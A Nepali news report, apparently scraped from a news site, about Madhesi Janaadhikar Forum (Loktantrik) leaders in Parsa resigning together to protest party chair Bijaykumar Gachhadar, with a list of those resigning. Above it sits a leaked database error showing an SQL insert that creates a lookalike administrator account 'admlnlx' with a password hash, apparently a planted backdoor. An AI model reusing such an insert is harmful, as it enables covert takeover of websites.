WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMNgYXAi2UFV2Kam4B5xT11bckzh.x0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:16:21', '', 'admlnlx', 'admlnlx')
प्रदिप मल्ल,
वीरगञ्ज, पुस ७–
मधेसी जन अधिकार फोरम (लोकतान्त्रिक) पर्सा कार्यसमितिलगायत विभिन्न भ्रातृसङ्गठनका अध्यक्षहरूले सामूहिक राजीनामा दिएका छन् ।
अध्यक्ष शशिकपुर मियाँँले यसपटकको राजीनामा अस्वीकृत गरिए पनि पार्टीमा नरहने दाबी गरे । उनले सामूहिक राजीनामा गरेका सबै नेता तथा कार्यकर्ताहरु शनिबार तमलोपामा प्रवेश गर्ने जानकारी दिए । पार्टी अध्यक्ष विजयकुमार गच्छदारको विरोधमा सामूहिक राजीनामा दिएको जिल्ला अध्यक्ष शशिकपुर मियाँले बताए । उनले यसअघि मधेस आन्दोलन–२०७२ ताका पनि पार्टी अध्यक्ष गच्छदारविरुद्ध सामूहिक राजीनामा दिएको तर पार्टी अध्यक्षले सुध्रिएर आउने, मधेसको माग सम्बोधन गराउने र जेल परेकाहरूलाई छुट्टाउने आश्वासन दिएकोले पार्टीमै फर्किएको बताए । तर सो अनुरूप कार्य नगरेको र अहिले संविधान संशोधन प्रस्ताव संसदमा दर्ता भएपछि पक्ष र विपक्ष दुवैतर्फ भूमिका नदेखिएकोले मधेसमा फोरम लोकतान्त्रिकको बढी नै आलोचना भएपछि सामूहिक राजीनामा गर्नु परेको बताए ।
सामूहिक राजीनामा दिनेहरूमा पार्टी अध्यक्ष्ँ मियाँ, उपाध्यक्षत्रय रविभूषण तिवारी, सुधीरनाथ पाण्डे, रामाज्ञा कुशवाहा, सचिव हरेन्द्र ठाकुर, दलित फोरमका अध्यक्ष्ँ मुक्ति बैठा, जिल्ला सदस्यहरू प्रमोद यादव, भोज महतो, रियाज खान, मुकेश पाण्डे, आबिद अन्सारी, शेख नसिम, राजेश प्रसाद, स्वास्थ्यकर्मी फोरमका अध्यक्ष्ँ रामेश्वरप्रसाद कुर्मी, इमामुद्दीन मियाँ, शिक्ष्ँक फोरमका महासचिव हासिम अन्सारी, सदस्य मोतीलाल साह, साबिर अन्सारी, जाकिर मियाँ, ग्यासुदिन मियाँ, मुर्सिद अन्सारी, अकिल अन्सारी रहेका छन् ।